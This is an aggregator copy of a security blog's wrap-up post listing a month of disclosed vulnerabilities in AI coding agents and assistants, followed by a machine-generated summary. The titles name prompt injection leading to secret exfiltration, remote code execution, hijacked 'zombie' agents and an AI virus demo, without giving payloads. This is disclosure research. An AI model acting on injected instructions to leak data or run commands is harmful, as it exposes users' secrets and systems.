Embrace The Red: Wrap Up: The Month of AI Bugs

Source URL: https://embracethered.com/blog/posts/2025/wrapping-up-month-of-ai-bugs/
Source: Embrace The Red
Title: Wrap Up: The Month of AI Bugs

Feedly Summary: That’s it.
The Month of AI Bugs is done. There won’t be a post tomorrow, because I will be at PAX West.
Overview of Posts ChatGPT: Exfiltrating Your Chat History and Memories With Prompt Injection | Video ChatGPT Codex: Turning ChatGPT Codex Into a ZombAI Agent | Video Anthropic Filesystem MCP Server: Directory Access Bypass Via Improper Path Validation | Video Cursor: Arbitrary Data Exfiltration via Mermaid | Video Amp Code: Arbitrary Command Execution via Prompt Injection | Video Devin AI: I Spent $500 To Test Devin For Prompt Injection So That You Don’t Have To Devin AI: How Devin AI Can Leak Your Secrets via Multiple Means Devin AI: The AI Kill Chain in Action: Exposing Ports to the Internet via Prompt Injection OpenHands – The Lethal Trifecta Strikes Again: How Prompt Injection Can Leak Access Tokens OpenHands: Remote Code Execution and AI ClickFix Demo | Video Claude Code: Data Exfiltration with DNS Requests (CVE-2025-55284) | Video GitHub Copilot: Remote Code Execution (CVE-2025-53773) | Video Google Jules: Vulnerable to Multiple Data Exfiltration Issues Google Jules – Zombie Agent: From Prompt Injection to Remote Control Google Jules: Vulnerable To Invisible Prompt Injection Amp Code: Invisible Prompt Injection Vulnerability Fixed Amp Code: Data Exfiltration via Image Rendering Fixed | Video Amazon Q Developer: Secrets Leaked via DNS and Prompt Injection | Video Amazon Q Developer: Remote Code Execution via Prompt Injection | Video Amazon Q Developer: Vulnerable to Invisible Prompt Injection | Video Windsurf: Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets | Video Windsurf: Memory-Persistent Data Exfiltration – SpAIware Exploit Windsurf: Sneaking Invisible Instructions by Developers Deep Research Agents: How Deep Research Agents Can Leak Your Data Manus: How Prompt Injection Hijacks Manus to Expose VS Code Server to the Internet | Video AWS Kiro: Arbitrary Code Execution via Indirect Prompt Injection | Video Cline: Vulnerable to Data Exfiltration and How to Protect Your Data | Video Windsurf MCP Integration: Missing Security Controls Put Users at Risk | Video Season Finale: AgentHopper: An AI Virus Research Project Demonstration | Video Thank you for following this research, and I hope it serves as a useful reference.

AI Summary and Description: Yes

Summary: The text provides a comprehensive overview of various AI security vulnerabilities and issues related to prompt injection. It highlights multiple instances of data exfiltration, remote code execution, and access bypass through a series of AI applications. This information is particularly relevant for security and compliance professionals focused on AI and cloud security.

Detailed Description: The content outlines critical security concerns across a range of AI systems, emphasizing the implications of vulnerabilities related to prompt injection and data exfiltration techniques. Notable points include:

– **Prompt Injection Vulnerabilities:** Various AI models, including ChatGPT and Devin AI, were found to be susceptible to prompt injection attacks, which can lead to serious security breaches.
– **Data Exfiltration Risks:**
– Multiple applications demonstrated flaws that allow for arbitrary data extraction, potentially exposing sensitive information or access tokens.
– Instances of artificial intelligence tools leaking user secrets via DNS requests and improper path validation highlight the urgent need for robust security measures.
– **Remote Code Execution:** Certain AI systems were identified as vulnerable to attacks capable of executing commands remotely, making them susceptible to exploitation by malicious actors.
– **Security Research and Awareness:** The text serves as a call to action for professionals in the field, underscoring the significance of continuous monitoring and evaluation of security practices within AI infrastructures.
– **Videos and Demonstrations:** The inclusion of video links suggests that practical demonstrations of these vulnerabilities are available, offering a hands-on look at how such issues can be exploited.

Relevance:
– AI Security: Directly pertains to vulnerabilities found in AI systems.
– Cloud Computing Security: Many examples involve cloud-based AI applications, emphasizing the intersection of cloud and AI security risks.
– Compliance and Governance: Highlights potential compliance risks associated with data handling and security vulnerabilities.

These insights can aid professionals in developing better security protocols and implementing effective measures against similar vulnerabilities in their environments.